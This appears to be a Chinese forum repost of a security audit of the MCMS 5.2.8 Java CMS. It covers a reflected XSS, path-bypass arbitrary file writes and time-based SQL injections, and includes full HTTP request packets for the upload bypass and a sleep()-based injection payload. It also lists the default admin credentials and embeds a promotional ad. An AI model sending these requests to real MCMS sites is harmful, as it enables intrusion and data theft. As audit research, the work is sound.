马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有账号?立即注册
x
MCMS 是 J2EE 系统,完整开源的Java CMS,基于SpringBoot 2架构,前端基于vue、element ui。为开发者提供上百套免费模板,同时提供适用的插件(文章、商城、微信、论坛、会员、评论、支付、积分、工作流、任务调度等...),一套简单好用的开源系统、一整套优质的开源生态内容体系。
十天前 MCMS 更新了新的一版本 5.2.9 提示新版本进行了 SQL 安全方面的优化,所以我们尝试 审计 MCMS 5.2.8
[img=720,226.03518267929635]https://www.hetianlab.com/headImg.action?news=c4e12479-8485-4297-976a-019d7a696601.png[/img]
环境搭建
我们下载好安装包后
- 利用 idea 打开项目
- 创建数据库 mcms,导入 doc/mcms-5.2.8.sql
- 修改 src/main/resources/application-dev.yml 中关于数据库设置参数
- 运行MSApplication.java main方法
- 利用账户名:密码 msopen:msopen 登录后台 http://localhost:8080/ms/login.do
- 进入后台点击内容管理->静态化菜单 -> 生成主页、生成栏目、生成文章
启动的时候会有一点小 bug 需要在 idea 中配置
[img=720,395.33742331288346]https://www.hetianlab.com/headImg.action?news=f3492d75-2588-46cf-99dc-08a6db799a05.png[/img]
运行成功后,页面如图所示
[img=720,400.5851979345955]https://www.hetianlab.com/img/logoTemp/b4e18309-2653-47c8-9d53-a49f062d7f3e.png[/img]
前台反射型 XSS
漏洞复现
[img=720,84.50861667442943]https://www.hetianlab.com/headImg.action?news=f260b367-973d-4ee0-942a-2fb0a8f21dfb.png[/img]
[img=720,101.25603864734299]https://www.hetianlab.com/headImg.action?news=a5e42245-5267-433e-ba37-d91bec7b25b6.png[/img]
[img=720,346.1414503133393]https://www.hetianlab.com/headImg.action?news=e9263580-62aa-4a99-ad6a-aaf3b1e79fb5.png[/img]
【----帮助网安学习,以下所有学习资料免费领!加vx:yj009991,备注 “博客园” 获取!】
① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC漏洞分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)
漏洞分析
我们看到运行后的控制台输出为
[img=720,255.3]https://www.hetianlab.com/headImg.action?news=f5f08379-ab10-47c3-b772-242aa453110c.png[/img]
我们找到 net.mingsoft.basic.filter.XssHttpServletRequestWrapper 并添加断点,再次触发漏洞,看到一个完整的调用栈,
net.mingsoft.basic.filter.XssHttpServletRequestWrapper#clean(java.lang.String, java.lang.String)
[img=720,335.9231077292751]https://www.hetianlab.com/headImg.action?news=640e557f-2161-479d-bd28-f2b9d7955dc1.png[/img]
后台命令执行一
漏洞复现
后台有一个可以上传模板文件的位置
[img=720,138.9523434423001]https://www.hetianlab.com/headImg.action?news=c6bd58a1-2d85-4b13-9ee0-be9c4faee035.png[/img]
我们上传文件并抓取数据包
[img=720,347.3854447439353]https://www.hetianlab.com/headImg.action?news=97cdb1a9-3ec0-4f04-a90d-975e28a4c029.png[/img]
我们看到数据包中的参数 uploadPath 指定了上传的位置,最后返回了上传后的路径以及文件内容
[img=720,346.1980830670926]https://www.hetianlab.com/headImg.action?news=2e56512c-b455-4d1c-ac95-937f85cab229.png[/img]
通过修改 参数 uploadPath 的值,我们就可以将文件上传 webapp 的任意目录下
我们写一个 1.txt 进行验证- POST /ms/file/uploadTemplate.do HTTP/1.1<br>Host: localhost:8080<br>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36<br>Content-Length: 506<br>Accept: */*<br>Accept-Encoding: identity<br>Accept-Language: zh-CN,zh;q=0.9<br>Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryz3nUf5Hws24R3B3A<br>Cookie: <br>Origin: http://localhost:8080<br>Referer: http://localhost:8080/ms/template/list.do?template=1/default<br>Sec-Fetch-Dest: empty<br>Sec-Fetch-Mode: cors<br>Sec-Fetch-Site: same-origin<br>sec-ch-ua: "Google Chrome";v="105", "Not)A;Brand";v="8", "Chromium";v="105"<br>sec-ch-ua-mobile: ?0<br>sec-ch-ua-platform: "Windows"<br><br>------WebKitFormBoundaryz3nUf5Hws24R3B3A<br>Content-Disposition: form-data; name="uploadPath"<br><br>/<br>------WebKitFormBoundaryz3nUf5Hws24R3B3A<br>Content-Disposition: form-data; name="uploadFloderPath"<br><br>true<br>------WebKitFormBoundaryz3nUf5Hws24R3B3A<br>Content-Disposition: form-data; name="rename"<br><br>false<br>------WebKitFormBoundaryz3nUf5Hws24R3B3A<br>Content-Disposition: form-data; name="file"; filename="1.txt"<br>Content-Type: text/html<br><br>test<br>------WebKitFormBoundaryz3nUf5Hws24R3B3A--
[img=720,109.45518453427066]https://www.hetianlab.com/headImg.action?news=bc2f6620-5dd1-434e-bfc0-2cc8f0e414fb.png[/img]
漏洞分析
通过路由 /ms/file/uploadTemplate 定位到代码位置
net.mingsoft.basic.action.ManageFileAction#uploadTemplate
[img=720,188.63361547763]https://www.hetianlab.com/headImg.action?news=2c832ab1-5f03-4824-9f4a-ad9df582baff.png[/img]
我们看到虽然存在非法路径过滤函数,查看函数内容,仅仅是对 ../ 进行了校验,通过绝对路径仍然可以绕过
net.mingsoft.basic.action.ManageFileAction#checkUploadPath
[img=720,35.559183673469384]https://www.hetianlab.com/headImg.action?news=733ca5e6-a8ad-48d8-8cfa-d268a997527d.png[/img]
net.mingsoft.basic.action.BaseFileAction#uploadTemplate
[img=720,396.0604364857303]https://www.hetianlab.com/headImg.action?news=69a23b56-f0c8-4093-8191-11ce83cfe5e3.png[/img]
后台命令执行二
漏洞复现
我们看到除了上传模板的接口,还存在编辑模板的接口
[img=720,148.78125]https://www.hetianlab.com/headImg.action?news=b9292ba5-0fae-4670-861a-881ad79bcfe0.png[/img]
点击编辑,编辑后保存并抓取数据包
原本的数据包
[img=720,346.36609558160507]https://www.hetianlab.com/headImg.action?news=f2d228e2-31a1-4789-9771-1f106169158c.png[/img]
我们看到参数 fileName 通过绝对路径指定了文件名,所以我们可以通过修改 fileName 来实现绝对路径写入
[img=720,292.5]https://www.hetianlab.com/headImg.action?news=821919ba-7dbe-4ee3-a92b-2e6222217710.png[/img]
[img=720,108.125]https://www.hetianlab.com/headImg.action?news=ed12a5ee-e903-480d-8809-373623a27ea7.png[/img]
漏洞分析
net.mingsoft.basic.action.TemplateAction#writeFileContent
[img=720,287.6541232986389]https://www.hetianlab.com/headImg.action?news=7c777bdc-fef6-4c59-ac02-7f93a2133ecc.png[/img]
我们看到对文件的后缀名进行了检验,但还是通过传入的参数 fileName 写入文件
后台命令执行三
漏洞复现
构造数据包- POST /ms/file/upload.do HTTP/1.1<br>Host: localhost:8080<br>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36<br>Content-Length: 506<br>Accept: */*<br>Accept-Encoding: identity<br>Accept-Language: zh-CN,zh;q=0.9<br>Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryz3nUf5Hws24R3B3A<br>Cookie: <br>Origin: http://localhost:8080<br>Referer: http://localhost:8080/ms/template/list.do?template=1/default<br>Sec-Fetch-Dest: empty<br>Sec-Fetch-Mode: cors<br>Sec-Fetch-Site: same-origin<br>sec-ch-ua: "Google Chrome";v="105", "Not)A;Brand";v="8", "Chromium";v="105"<br>sec-ch-ua-mobile: ?0<br>sec-ch-ua-platform: "Windows"<br><br>------WebKitFormBoundaryz3nUf5Hws24R3B3A<br>Content-Disposition: form-data; name="uploadPath"<br><br>/<br>------WebKitFormBoundaryz3nUf5Hws24R3B3A<br>Content-Disposition: form-data; name="uploadFloderPath"<br><br>true<br><br>------WebKitFormBoundaryz3nUf5Hws24R3B3A<br>Content-Disposition: form-data; name="rename"<br><br>false<br><br>------WebKitFormBoundaryz3nUf5Hws24R3B3A<br>Content-Disposition: form-data; name="file"; filename="3.txt"<br>Content-Type: text/html<br><br>test<br>------WebKitFormBoundaryz3nUf5Hws24R3B3A--<br>
[img=720,350.76091850517787]https://www.hetianlab.com/headImg.action?news=a785f03c-8e40-435c-82de-a581e87f4263.png[/img]
漏洞分析
这个漏洞是在第一个后台命令执行的基础上发现的,两个类位于同一个文件内
net.mingsoft.basic.action.ManageFileAction#upload
[img=720,295.4117647058824]https://www.hetianlab.com/headImg.action?news=cdd370d4-28c7-4ae9-a31d-8923772baa13.png[/img]
虽然存在非法路径过滤函数 checkUploadPath ,查看函数内容,仅仅是对 ../ 进行了校验,通过绝对路径仍然可以绕过
对文件的上传是利用了
net.mingsoft.basic.action.BaseFileAction#upload
[img=720,293.62255965292843]https://www.hetianlab.com/headImg.action?news=8888ba5c-b816-452d-af66-ea7fa3ff58d5.png[/img]
存在很多过滤,但是还是可以成功上传文件
后台 SQL 注入漏洞
漏洞复现
构造数据包- GET /ms/mdiy/page/verify.do?fieldName=1;select/**/if(substring((select/**/database()),1,4)='mcms',sleep(5),1)/**/and/**/1&fieldValue=1&id=1&idName=1 HTTP/1.1<br>Host: localhost:8080<br>Accept: application/json, text/plain, */*<br>Accept-Encoding: gzip, deflate, br<br>Accept-Language: zh-CN,zh;q=0.9<br>Cache-Control: no-cache<br>Cookie:<br>Pragma: no-cache<br>Referer: http://localhost:8080/ms/model/index.do?<br>Sec-Fetch-Dest: empty<br>Sec-Fetch-Mode: cors<br>Sec-Fetch-Site: same-origin<br>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36<br>X-Requested-With: XMLHttpRequest<br>sec-ch-ua: "Google Chrome";v="105", "Not)A;Brand";v="8", "Chromium";v="105"<br>sec-ch-ua-mobile: ?0<br>sec-ch-ua-platform: "Windows"<br>token: null
发现成功使得服务器沉睡五秒
漏洞分析
net.mingsoft.mdiy.action.PageAction#verify
[img=720,271.0494169905608]https://www.hetianlab.com/headImg.action?news=9a2f7410-a0e4-45a9-9e5f-39f201e8dc89.png[/img]
获取参数并传到方法 validated
net.mingsoft.basic.action.BaseAction#validated(java.lang.String, java.lang.String, java.lang.String)
[img=720,204.81054365733112]https://www.hetianlab.com/headImg.action?news=cc58de33-befd-4aab-b893-cdac4259e8f6.png[/img]
将 fieldName 和 fieldValue 的传入到 where 参数中
net.mingsoft.base.biz.impl.BaseBizImpl#queryBySQL(java.lang.String, java.util.List, java.util.Map)
[img=720,77.91700569568755]https://www.hetianlab.com/headImg.action?news=455b13c2-07bb-4b99-a904-a867832680dd.png[/img]
net.mingsoft.base.dao.IBaseDao#queryBySQL
[img=720,230.60911657926584]https://www.hetianlab.com/headImg.action?news=6a7514d9-2f61-400d-99df-fee704ac0bb1.png[/img]
因为是 mybits 所以未采用预编译的 ${ 就容易产生注入
[img=720,401.6979987871437]https://www.hetianlab.com/headImg.action?news=37c0bc30-85e6-4806-8893-424118311fea.png[/img]
后台 SQL 注入二
漏洞复现
登录后台后我们找到自定义模型的位置
[img=720,334.0642129992169]https://www.hetianlab.com/headImg.action?news=05accfe3-3d09-4e82-be10-aa2971adc32c.png[/img]
根据代码生成器 生成一个自定义模型 json 并导入保存
点击删除时 抓取数据包
[img=720,151.1342894393742]https://www.hetianlab.com/headImg.action?news=0d81d28f-4206-4b20-bae5-98a5e0424b40.png[/img]
修改modelTableName
[img=720,359.3430656934307]https://www.hetianlab.com/headImg.action?news=87c4074b-024b-437c-be19-d0bf9a0f284b.png[/img]
发现成功使得服务器沉睡五秒
漏洞分析
net.mingsoft.mdiy.action.ModelAction#delete
[img=720,286.58017644006225]https://www.hetianlab.com/headImg.action?news=8577dc26-5f03-49df-bbd2-cb96e902b908.png[/img]
net.mingsoft.base.biz.impl.BaseBizImpl#dropTable
[img=720,66.04026845637584]https://www.hetianlab.com/headImg.action?news=35812e4b-ccee-44b4-8f02-14b191e62b6e.png[/img]
net.mingsoft.base.dao.IBaseDao
[img=720,178.58902575587905]https://www.hetianlab.com/headImg.action?news=b4e855a9-08aa-4e96-857d-42b81b7a139a.png[/img]
[img=720,95.14285714285714]https://www.hetianlab.com/headImg.action?news=bebbda4c-518e-47b9-9fa5-3eb862e2c8f4.png[/img]
查看dropTable对应的mapper内容如下,直接将table内容进行拼接且未预编译,造成SQL注入。
更多靶场实验练习、网安学习资料,请点击这里>>
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作! |
